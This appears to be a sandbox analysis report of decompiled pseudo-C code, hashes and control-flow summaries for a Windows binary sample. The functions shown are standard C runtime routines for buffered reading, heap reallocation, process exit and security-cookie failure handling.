                                                          							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                                                          								_t100 = 0x1000;
                                                          							} else {
                                                          								_t100 =  *(_t119 + 0x18);
                                                          							}
                                                          							_v16 = _t100;
                                                          							__eflags = _t117;
                                                          							if(_t117 == 0) {
                                                          								L41:
                                                          								return _a16;
                                                          							} else {
                                                          								do {
                                                          									__eflags =  *(_t119 + 0xc) & 0x0000010c;
                                                          									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                                                          										L24:
                                                          										__eflags = _t98 - _t100;
                                                          										if(_t98 < _t100) {
                                                          											_t81 = E00401829(_t98, _t119, _t119);
                                                          											__eflags = _t81 - 0xffffffff;
                                                          											if(_t81 == 0xffffffff) {
                                                          												L46:
                                                          												return (_t117 - _t98) / _a12;
                                                          											}
                                                          											_t102 = _v12;
                                                          											__eflags = _t102;
                                                          											if(_t102 == 0) {
                                                          												L42:
                                                          												__eflags = _a8 - 0xffffffff;
                                                          												if(_a8 != 0xffffffff) {
                                                          													E00401B60(_a4, 0, _a8);
                                                          												}
                                                          												 *((intOrPtr*)(E004024C9())) = 0x22;
                                                          												L4:
                                                          												E004017EE();
                                                          												goto L5;
                                                          											}
                                                          											_t110 = _v8;
                                                          											 *_t110 = _t81;
                                                          											_t98 = _t98 - 1;
                                                          											_v8 = _t110 + 1;
                                                          											_t103 = _t102 - 1;
                                                          											__eflags = _t103;
                                                          											_v12 = _t103;
                                                          											_t100 =  *(_t119 + 0x18);
                                                          											_v16 = _t100;
                                                          											goto L40;
                                                          										}
                                                          										__eflags = _t100;
                                                          										if(_t100 == 0) {
                                                          											_t86 = 0x7fffffff;
                                                          											__eflags = _t98 - 0x7fffffff;
                                                          											if(_t98 <= 0x7fffffff) {
                                                          												_t86 = _t98;
                                                          											}
                                                          										} else {
                                                          											__eflags = _t98 - 0x7fffffff;
                                                          											if(_t98 <= 0x7fffffff) {
                                                          												_t44 = _t98 % _t100;
                                                          												__eflags = _t44;
                                                          												_t113 = _t44;
                                                          												_t91 = _t98;
                                                          											} else {
                                                          												_t113 = 0x7fffffff % _t100;
                                                          												_t91 = 0x7fffffff;
                                                          											}
                                                          											_t86 = _t91 - _t113;
                                                          										}
                                                          										__eflags = _t86 - _v12;
                                                          										if(_t86 > _v12) {
                                                          											goto L42;
                                                          										} else {
                                                          											_push(_t86);
                                                          											_push(_v8);
                                                          											_push(E0040194A(_t119));
                                                          											_t88 = E00401D04();
                                                          											_t120 = _t120 + 0xc;
                                                          											__eflags = _t88;
                                                          											if(_t88 == 0) {
                                                          												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
                                                          												goto L46;
                                                          											}
                                                          											__eflags = _t88 - 0xffffffff;
                                                          											if(_t88 == 0xffffffff) {
                                                          												L45:
                                                          												_t64 = _t119 + 0xc;
                                                          												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
                                                          												__eflags =  *_t64;
                                                          												goto L46;
                                                          											}
                                                          											_t98 = _t98 - _t88;
                                                          											__eflags = _t98;
                                                          											L36:
                                                          											_v8 = _v8 + _t88;
                                                          											_v12 = _v12 - _t88;
                                                          											_t100 = _v16;
                                                          											goto L40;
                                                          										}
                                                          									}
                                                          									_t94 =  *(_t119 + 4);
                                                          									_v20 = _t94;
                                                          									__eflags = _t94;
                                                          									if(__eflags == 0) {
                                                          										goto L24;
                                                          									}
                                                          									if(__eflags < 0) {
                                                          										goto L45;
                                                          									}
                                                          									__eflags = _t98 - _t94;
                                                          									if(_t98 < _t94) {
                                                          										_t94 = _t98;
                                                          										_v20 = _t98;
                                                          									}
                                                          									_t104 = _v12;
                                                          									__eflags = _t94 - _t104;
                                                          									if(_t94 > _t104) {
                                                          										goto L42;
                                                          									} else {
                                                          										E00401ADE(_v8, _t104,  *_t119, _t94);
                                                          										_t88 = _v20;
                                                          										_t120 = _t120 + 0x10;
                                                          										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
                                                          										_t98 = _t98 - _t88;
                                                          										 *_t119 =  *_t119 + _t88;
                                                          										goto L36;
                                                          									}
                                                          									L40:
                                                          									__eflags = _t98;
                                                          								} while (_t98 != 0);
                                                          								goto L41;
                                                          							}
                                                          						}
                                                          					}
                                                          					_t74 = (_t74 | 0xffffffff) / _a12;
                                                          					__eflags = _t97 - _t74;
                                                          					if(_t97 <= _t74) {
                                                          						goto L13;
                                                          					}
                                                          					goto L9;
                                                          				}
                                                          				L3:
                                                          				 *((intOrPtr*)(E004024C9())) = 0x16;
                                                          				goto L4;
                                                          			}




























                                                          0x004011c6
                                                          0x004011c9
                                                          0x004011cf
                                                          0x004011d2
                                                          0x004011d5
                                                          0x004011f2
                                                          0x00000000
                                                          0x004011f2
                                                          0x004011d7
                                                          0x004011dc
                                                          0x00000000
                                                          0x00000000
                                                          0x004011e0
                                                          0x004011fb
                                                          0x004011fe
                                                          0x00401200
                                                          0x0040120e
                                                          0x0040120e
                                                          0x00401212
                                                          0x0040121a
                                                          0x0040121f
                                                          0x0040121f
                                                          0x00401222
                                                          0x00401224
                                                          0x00000000
                                                          0x00401226
                                                          0x00401226
                                                          0x0040122e
                                                          0x00401230
                                                          0x00000000
                                                          0x00000000
                                                          0x00401232
                                                          0x00401235
                                                          0x00401238
                                                          0x0040123f
                                                          0x00401241
                                                          0x00401248
                                                          0x00401243
                                                          0x00401243
                                                          0x00401243
                                                          0x0040124d
                                                          0x00401250
                                                          0x00401252
                                                          0x0040133b
                                                          0x00000000
                                                          0x00401258
                                                          0x00401258
                                                          0x00401258
                                                          0x0040125f
                                                          0x004012a0
                                                          0x004012a0
                                                          0x004012a2
                                                          0x0040130d
                                                          0x00401313
                                                          0x00401316
                                                          0x0040136d
                                                          0x00000000
                                                          0x00401373
                                                          0x00401318
                                                          0x0040131b
                                                          0x0040131d
                                                          0x00401343
                                                          0x00401343
                                                          0x00401347
                                                          0x00401351
                                                          0x00401356
                                                          0x0040135e
                                                          0x004011ed
                                                          0x004011ed
                                                          0x00000000
                                                          0x004011ed
                                                          0x0040131f
                                                          0x00401322
                                                          0x00401325
                                                          0x00401326
                                                          0x00401329
                                                          0x00401329
                                                          0x0040132a
                                                          0x0040132d
                                                          0x00401330
                                                          0x00000000
                                                          0x00401330
                                                          0x004012a4
                                                          0x004012a6
                                                          0x004012ca
                                                          0x004012cf
                                                          0x004012d5
                                                          0x004012d7
                                                          0x004012d7
                                                          0x004012a8
                                                          0x004012aa
                                                          0x004012b0
                                                          0x004012c2
                                                          0x004012c2
                                                          0x004012c2
                                                          0x004012c4
                                                          0x004012b2
                                                          0x004012b7
                                                          0x004012b9
                                                          0x004012b9
                                                          0x004012c6
                                                          0x004012c6
                                                          0x004012d9
                                                          0x004012dc
                                                          0x00000000
                                                          0x004012de
                                                          0x004012de
                                                          0x004012df
                                                          0x004012e9
                                                          0x004012ea
                                                          0x004012ef
                                                          0x004012f2
                                                          0x004012f4
                                                          0x0040137b
                                                          0x00000000
                                                          0x0040137b
                                                          0x004012fa
                                                          0x004012fd
                                                          0x00401369
                                                          0x00401369
                                                          0x00401369
                                                          0x00401369
                                                          0x00000000
                                                          0x00401369
                                                          0x004012ff
                                                          0x004012ff
                                                          0x00401301
                                                          0x00401301
                                                          0x00401304
                                                          0x00401307
                                                          0x00000000
                                                          0x00401307
                                                          0x004012dc
                                                          0x00401261
                                                          0x00401264
                                                          0x00401267
                                                          0x00401269
                                                          0x00000000
                                                          0x00000000
                                                          0x0040126b
                                                          0x00000000
                                                          0x00000000
                                                          0x00401271
                                                          0x00401273
                                                          0x00401275
                                                          0x00401277
                                                          0x00401277
                                                          0x0040127a
                                                          0x0040127d
                                                          0x0040127f
                                                          0x00000000
                                                          0x00401285
                                                          0x0040128c
                                                          0x00401291
                                                          0x00401294
                                                          0x00401297
                                                          0x0040129a
                                                          0x0040129c
                                                          0x00000000
                                                          0x0040129c
                                                          0x00401333
                                                          0x00401333
                                                          0x00401333
                                                          0x00000000
                                                          0x00401258
                                                          0x00401252
                                                          0x00401224
                                                          0x00401207
                                                          0x0040120a
                                                          0x0040120c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040120c
                                                          0x004011e2
                                                          0x004011e7
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.322248773.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000006.00000002.322210111.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000006.00000002.322264048.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000006.00000002.322328907.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_ltqmdmdi.jbxd
                                                          Similarity
                                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                          • String ID:
                                                          • API String ID: 1559183368-0
                                                          • Opcode ID: 5112d85f97c71c139c9da0b529e63dbc9639d42f3f555ff927f58fbeb55d1acd
                                                          • Instruction ID: cf3cdffc9f5a22b3a5bc0b0a3e7c0e9796cf8811e6014f552bdcdaa456813bfd
                                                          • Opcode Fuzzy Hash: 5112d85f97c71c139c9da0b529e63dbc9639d42f3f555ff927f58fbeb55d1acd
                                                          • Instruction Fuzzy Hash: 2451D430A00205DBDB248EAAC88466F77A5AF44320F24877FF825F66E0D7789E519B49
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 380 408075-40807c 381 408089-40808f 380->381 382 40807e-408088 call 407fe3 380->382 383 408091-40809c call 404535 381->383 384 40809e-40809f 381->384 392 4080eb-4080ed 383->392 387 4080d1-4080d4 384->387 390 4080a1-4080a3 387->390 391 4080d6-4080e2 call 406d05 call 4024c9 387->391 393 4080a5 390->393 394 4080a6-4080bc HeapReAlloc 390->394 406 4080e8 391->406 393->394 396 40811c-40811e 394->396 397 4080be-4080c4 394->397 401 4080ea 396->401 399 408106-40811a call 4024c9 GetLastError call 4024dc 397->399 400 4080c6-4080cf call 406d05 397->400 399->396 400->387 409 4080ee-408104 call 4024c9 GetLastError call 4024dc 400->409 401->392 406->401 409->406
                                                          C-Code - Quality: 95%
                                                          			E00408075(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                                          				void* _t7;
                                                          				void* _t8;
                                                          				intOrPtr* _t9;
                                                          				intOrPtr* _t12;
                                                          				void* _t20;
                                                          				long _t31;
                                                          
                                                          				if(_a4 != 0) {
                                                          					_t31 = _a8;
                                                          					if(_t31 != 0) {
                                                          						_push(__ebx);
                                                          						while(_t31 <= 0xffffffe0) {
                                                          							if(_t31 == 0) {
                                                          								_t31 = _t31 + 1;
                                                          							}
                                                          							_t7 = HeapReAlloc( *0x414224, 0, _a4, _t31);
                                                          							_t20 = _t7;
                                                          							if(_t20 != 0) {
                                                          								L17:
                                                          								_t8 = _t20;
                                                          							} else {
                                                          								if( *0x415060 == _t7) {
                                                          									_t9 = E004024C9();
                                                          									 *_t9 = E004024DC(GetLastError());
                                                          									goto L17;
                                                          								} else {
                                                          									if(E00406D05(_t7, _t31) == 0) {
                                                          										_t12 = E004024C9();
                                                          										 *_t12 = E004024DC(GetLastError());
                                                          										L12:
                                                          										_t8 = 0;
                                                          									} else {
                                                          										continue;
                                                          									}
                                                          								}
                                                          							}
                                                          							goto L14;
                                                          						}
                                                          						E00406D05(_t6, _t31);
                                                          						 *((intOrPtr*)(E004024C9())) = 0xc;
                                                          						goto L12;
                                                          					} else {
                                                          						E00404535(_a4);
                                                          						_t8 = 0;
                                                          					}
                                                          					L14:
                                                          					return _t8;
                                                          				} else {
                                                          					return E00407FE3(__ebx, __edx, __edi, _a8);
                                                          				}
                                                          			}









                                                          0x0040807c
                                                          0x0040808a
                                                          0x0040808f
                                                          0x0040809e
                                                          0x004080d1
                                                          0x004080a3
                                                          0x004080a5
                                                          0x004080a5
                                                          0x004080b2
                                                          0x004080b8
                                                          0x004080bc
                                                          0x0040811c
                                                          0x0040811c
                                                          0x004080be
                                                          0x004080c4
                                                          0x00408106
                                                          0x0040811a
                                                          0x00000000
                                                          0x004080c6
                                                          0x004080cf
                                                          0x004080ee
                                                          0x00408102
                                                          0x004080e8
                                                          0x004080e8
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004080cf
                                                          0x004080c4
                                                          0x00000000
                                                          0x004080ea
                                                          0x004080d7
                                                          0x004080e2
                                                          0x00000000
                                                          0x00408091
                                                          0x00408094
                                                          0x0040809a
                                                          0x0040809a
                                                          0x004080eb
                                                          0x004080ed
                                                          0x0040807e
                                                          0x00408088
                                                          0x00408088

                                                          APIs
                                                          • _malloc.LIBCMT ref: 00408081
                                                            • Part of subcall function 00407FE3: __FF_MSGBANNER.LIBCMT ref: 00407FFA
                                                            • Part of subcall function 00407FE3: __NMSG_WRITE.LIBCMT ref: 00408001
                                                            • Part of subcall function 00407FE3: RtlAllocateHeap.NTDLL(006D0000,00000000,00000001,00000000,00000000,00000000,?,004045CB,00000000,00000000,00000000,00000000,?,00404480,00000018,00411FD8), ref: 00408026
                                                          • _free.LIBCMT ref: 00408094
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.322248773.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000006.00000002.322210111.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000006.00000002.322264048.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000006.00000002.322328907.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_ltqmdmdi.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap_free_malloc
                                                          • String ID:
                                                          • API String ID: 1020059152-0
                                                          • Opcode ID: 203b7c5fc3a61a23da61efa24fa73c8b6d154fd32cc8f013885648f5e2350aaa
                                                          • Instruction ID: 9f8fe8c4bbd9e52b1c20aa057dcece5d638b265e9f3ef175acddb1746402e183
                                                          • Opcode Fuzzy Hash: 203b7c5fc3a61a23da61efa24fa73c8b6d154fd32cc8f013885648f5e2350aaa
                                                          • Instruction Fuzzy Hash: 2E110A32504215ABCB202F76FE0966B37A46F44364F11893FF989BA2D0DF7C8885C69C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 416 4030de-4030f5 GetModuleHandleExW 417 4030f7-403107 GetProcAddress 416->417 418 40310e-403111 416->418 417->418 419 403109 417->419 419->418
                                                          C-Code - Quality: 16%
                                                          			E004030DE(void* __ecx, intOrPtr _a4) {
                                                          				struct HINSTANCE__* _v8;
                                                          				_Unknown_base(*)()* _t4;
                                                          
                                                          				_t4 =  &_v8;
                                                          				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
                                                          				if(_t4 != 0) {
                                                          					_t4 = GetProcAddress(_v8, "CorExitProcess");
                                                          					if(_t4 != 0) {
                                                          						return  *_t4(_a4);
                                                          					}
                                                          				}
                                                          				return _t4;
                                                          			}





                                                          0x004030e2
                                                          0x004030ed
                                                          0x004030f5
                                                          0x004030ff
                                                          0x00403107
                                                          0x00000000
                                                          0x0040310c
                                                          0x00403107
                                                          0x00403111

                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,0040311D,00000000,?,00408010,000000FF,0000001E,00000000,00000000,00000000,?,004045CB), ref: 004030ED
                                                          • GetProcAddress.KERNEL32(?,CorExitProcess), ref: 004030FF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.322248773.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000006.00000002.322210111.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000006.00000002.322264048.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000006.00000002.322328907.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_ltqmdmdi.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 1646373207-1276376045
                                                          • Opcode ID: e41157a03b6b2c61028faa385d86cc0ba5d050f528bde22708dc0c239dc5d6e7
                                                          • Instruction ID: 7a72415fad87126f0e2fa5a039a0ddc386d1adc0ae7252d34b4d1e54dfdeeb3d
                                                          • Opcode Fuzzy Hash: e41157a03b6b2c61028faa385d86cc0ba5d050f528bde22708dc0c239dc5d6e7
                                                          • Instruction Fuzzy Hash: 48D0123034020CBBEB109F93DE05F5A7EADDB08742F10097ABD08F51D1DA75EA309669
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 420 40a93d-40a946 421 40a9a7-40a9b9 call 40ae8e 420->421 422 40a948-40a94b 420->422 425 40a9be-40a9c2 421->425 422->421 424 40a94d-40a950 422->424 426 40a952-40a96a call 40b048 424->426 427 40a96b-40a96e 424->427 428 40a970-40a973 427->428 429 40a98e-40a9a5 call 40a9c3 427->429 428->429 432 40a975-40a98c call 40b109 428->432 429->425 432->425
                                                          C-Code - Quality: 100%
                                                          			E0040A93D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                          				intOrPtr _t25;
                                                          				void* _t26;
                                                          
                                                          				_t25 = _a16;
                                                          				if(_t25 == 0x65 || _t25 == 0x45) {
                                                          					_t26 = E0040AE8E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                          					goto L9;
                                                          				} else {
                                                          					_t34 = _t25 - 0x66;
                                                          					if(_t25 != 0x66) {
                                                          						__eflags = _t25 - 0x61;
                                                          						if(_t25 == 0x61) {
                                                          							L7:
                                                          							_t26 = E0040A9C3(_a4, _a8, _a12, _a20, _a24, _a28);
                                                          						} else {
                                                          							__eflags = _t25 - 0x41;
                                                          							if(__eflags == 0) {
                                                          								goto L7;
                                                          							} else {
                                                          								_t26 = E0040B109(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                          							}
                                                          						}
                                                          						L9:
                                                          						return _t26;
                                                          					} else {
                                                          						return E0040B048(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
                                                          					}
                                                          				}
                                                          			}





                                                          0x0040a940
                                                          0x0040a946
                                                          0x0040a9b9
                                                          0x00000000
                                                          0x0040a94d
                                                          0x0040a94d
                                                          0x0040a950
                                                          0x0040a96b
                                                          0x0040a96e
                                                          0x0040a98e
                                                          0x0040a9a0
                                                          0x0040a970
                                                          0x0040a970
                                                          0x0040a973
                                                          0x00000000
                                                          0x0040a975
                                                          0x0040a987
                                                          0x0040a987
                                                          0x0040a973
                                                          0x0040a9be
                                                          0x0040a9c2
                                                          0x0040a952
                                                          0x0040a96a
                                                          0x0040a96a
                                                          0x0040a950

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.322248773.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000006.00000002.322210111.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000006.00000002.322264048.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000006.00000002.322328907.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_ltqmdmdi.jbxd
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                          • Instruction ID: b85d4b3049c9008af4f0c0b863223919110253e8b4ae8400fcd67ebda280d961
                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                          • Instruction Fuzzy Hash: 370142B214024DBBCF125E85CC11CEE3F26BF18354B598826FE1868171D33AC971AB86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E0040412D(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                          				intOrPtr _v0;
                                                          				void* _v808;
                                                          				int _t9;
                                                          				intOrPtr _t14;
                                                          				signed int _t15;
                                                          				signed int _t17;
                                                          				signed int _t19;
                                                          				intOrPtr _t22;
                                                          				intOrPtr _t23;
                                                          				intOrPtr _t24;
                                                          				intOrPtr _t25;
                                                          				intOrPtr _t26;
                                                          				intOrPtr _t27;
                                                          				intOrPtr _t28;
                                                          				intOrPtr* _t30;
                                                          				intOrPtr* _t32;
                                                          				void* _t35;
                                                          
                                                          				_t28 = __esi;
                                                          				_t27 = __edi;
                                                          				_t26 = __edx;
                                                          				_t23 = __ecx;
                                                          				_t22 = __ebx;
                                                          				_t35 = _t23 -  *0x413500; // 0xc27c5e7
                                                          				if(_t35 == 0) {
                                                          					asm("repe ret");
                                                          				}
                                                          				_t30 = _t32;
                                                          				_t9 = IsProcessorFeaturePresent(0x17);
                                                          				if(_t9 != 0) {
                                                          					_t23 = 2;
                                                          					asm("int 0x29");
                                                          				}
                                                          				 *0x414e30 = _t9;
                                                          				 *0x414e2c = _t23;
                                                          				 *0x414e28 = _t26;
                                                          				 *0x414e24 = _t22;
                                                          				 *0x414e20 = _t28;
                                                          				 *0x414e1c = _t27;
                                                          				 *0x414e48 = ss;
                                                          				 *0x414e3c = cs;
                                                          				 *0x414e18 = ds;
                                                          				 *0x414e14 = es;
                                                          				 *0x414e10 = fs;
                                                          				 *0x414e0c = gs;
                                                          				asm("pushfd");
                                                          				_pop( *0x414e40);
                                                          				 *0x414e34 =  *_t30;
                                                          				 *0x414e38 = _v0;
                                                          				 *0x414e44 =  &_a4;
                                                          				 *0x414d80 = 0x10001;
                                                          				_t14 =  *0x414e38; // 0x0
                                                          				 *0x414d3c = _t14;
                                                          				 *0x414d30 = 0xc0000409;
                                                          				 *0x414d34 = 1;
                                                          				 *0x414d40 = 1;
                                                          				_t15 = 4;
                                                          				 *((intOrPtr*)(0x414d44 + _t15 * 0)) = 2;
                                                          				_t17 = 4;
                                                          				_t24 =  *0x413500; // 0xc27c5e7
                                                          				 *((intOrPtr*)(_t30 + _t17 * 0 - 8)) = _t24;
                                                          				_t19 = 4;
                                                          				_t25 =  *0x413504; // 0xf3d83a18
                                                          				 *((intOrPtr*)(_t30 + (_t19 << 0) - 8)) = _t25;
                                                          				return E0040738B(_t19 << 0, "0MA");
                                                          			}




















                                                          0x0040412d
                                                          0x0040412d
                                                          0x0040412d
                                                          0x0040412d
                                                          0x0040412d
                                                          0x0040412d
                                                          0x00404133
                                                          0x00404135
                                                          0x00404135
                                                          0x004073c9
                                                          0x004073d3
                                                          0x004073da
                                                          0x004073de
                                                          0x004073df
                                                          0x004073df
                                                          0x004073e1
                                                          0x004073e6
                                                          0x004073ec
                                                          0x004073f2
                                                          0x004073f8
                                                          0x004073fe
                                                          0x00407404
                                                          0x0040740b
                                                          0x00407412
                                                          0x00407419
                                                          0x00407420
                                                          0x00407427
                                                          0x0040742e
                                                          0x0040742f
                                                          0x00407438
                                                          0x00407440
                                                          0x00407448
                                                          0x00407453
                                                          0x0040745d
                                                          0x00407462
                                                          0x00407467
                                                          0x00407471
                                                          0x0040747b
                                                          0x00407487
                                                          0x0040748b
                                                          0x00407497
                                                          0x0040749b
                                                          0x004074a1
                                                          0x004074a7
                                                          0x004074ab
                                                          0x004074b1
                                                          0x004074c2

                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004073D3
                                                          • ___raise_securityfailure.LIBCMT ref: 004074BA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.322248773.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000006.00000002.322210111.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000006.00000002.322264048.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000006.00000002.322328907.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_ltqmdmdi.jbxd
                                                          Similarity
                                                          • API ID: FeaturePresentProcessor___raise_securityfailure
                                                          • String ID: 0MA
                                                          • API String ID: 3761405300-2670099660
                                                          • Opcode ID: 10687dbb931aabde788e87b565521ef1de1769e34277da068579617722567ceb
                                                          • Instruction ID: 4d7014942219b6f5ceedf13c626a08c3852bc8b33df36f437cf18d2bd91ecdc5
                                                          • Opcode Fuzzy Hash: 10687dbb931aabde788e87b565521ef1de1769e34277da068579617722567ceb
                                                          • Instruction Fuzzy Hash: A521F0B5550304DBEB11DF55FE81A907BA4BB88710F14D03AE9089B7A0E3B95A91CB4D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040196E() {
                                                          				intOrPtr _t3;
                                                          				intOrPtr _t4;
                                                          				void* _t6;
                                                          				intOrPtr _t9;
                                                          				void* _t12;
                                                          				intOrPtr _t13;
                                                          
                                                          				_t3 =  *0x416124;
                                                          				_t13 = 0x14;
                                                          				if(_t3 != 0) {
                                                          					if(_t3 < _t13) {
                                                          						_t3 = _t13;
                                                          						goto L4;
                                                          					}
                                                          				} else {
                                                          					_t3 = 0x200;
                                                          					L4:
                                                          					 *0x416124 = _t3;
                                                          				}
                                                          				_t4 = E0040456D(_t3, 4);
                                                          				 *0x416120 = _t4;
                                                          				if(_t4 != 0) {
                                                          					L8:
                                                          					_t12 = 0;
                                                          					_t9 = 0x413008;
                                                          					while(1) {
                                                          						 *((intOrPtr*)(_t12 + _t4)) = _t9;
                                                          						_t9 = _t9 + 0x20;
                                                          						_t12 = _t12 + 4;
                                                          						if(_t9 >= 0x413288) {
                                                          							break;
                                                          						}
                                                          						_t4 =  *0x416120;
                                                          					}
                                                          					return 0;
                                                          				} else {
                                                          					 *0x416124 = _t13;
                                                          					_t4 = E0040456D(_t13, 4);
                                                          					 *0x416120 = _t4;
                                                          					if(_t4 != 0) {
                                                          						goto L8;
                                                          					} else {
                                                          						_t6 = 0x1a;
                                                          						return _t6;
                                                          					}
                                                          				}
                                                          			}









                                                          0x0040196e
                                                          0x00401976
                                                          0x00401979
                                                          0x00401984
                                                          0x00401986
                                                          0x00000000
                                                          0x00401986
                                                          0x0040197b
                                                          0x0040197b
                                                          0x00401988
                                                          0x00401988
                                                          0x00401988
                                                          0x00401990
                                                          0x00401995
                                                          0x0040199e
                                                          0x004019be
                                                          0x004019be
                                                          0x004019c0
                                                          0x004019c5
                                                          0x004019c5
                                                          0x004019c8
                                                          0x004019cb
                                                          0x004019d4
                                                          0x00000000
                                                          0x00000000
                                                          0x004019d6
                                                          0x004019d6
                                                          0x004019e0
                                                          0x004019a0
                                                          0x004019a3
                                                          0x004019a9
                                                          0x004019ae
                                                          0x004019b7
                                                          0x00000000
                                                          0x004019b9
                                                          0x004019bb
                                                          0x004019bd
                                                          0x004019bd
                                                          0x004019b7

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.322248773.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000006.00000002.322210111.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000006.00000002.322264048.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000006.00000002.322328907.0000000000413000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_ltqmdmdi.jbxd
                                                          Similarity
                                                          • API ID: __calloc_crt
                                                          • String ID: QA
                                                          • API String ID: 3494438863-1702331105
                                                          • Opcode ID: ab66dc2785c0eaa86ca07f30eb9e7e37c32c8d7cc2ef92006f770ad8a9994b00
                                                          • Instruction ID: 3e9ddad1e3de1c0e95620cbe28ab7805e9b9329235e72186096bcbda3288e2ad
                                                          • Opcode Fuzzy Hash: ab66dc2785c0eaa86ca07f30eb9e7e37c32c8d7cc2ef92006f770ad8a9994b00
                                                          • Instruction Fuzzy Hash: 27F0C8F1345201AAF714CB65BD516D56FE5E748724F21413FE640EA2E5E338C841C74C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • DecodePointer.KERNEL32(?,004017FA,00000000,00000000,00000000,00000000,00000000,00403C29,?,004039CE,00000003,00407FFF,00000000,00000000,00000000), ref: 004017CC
                                                          • __invoke_watson.LIBCMT ref: 004017E8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.322248773.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000006.00000002.322210111.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000006.00000002.322264048.000000000040E000.00000002.00000001.01000000.00000006.sdmpDownload File
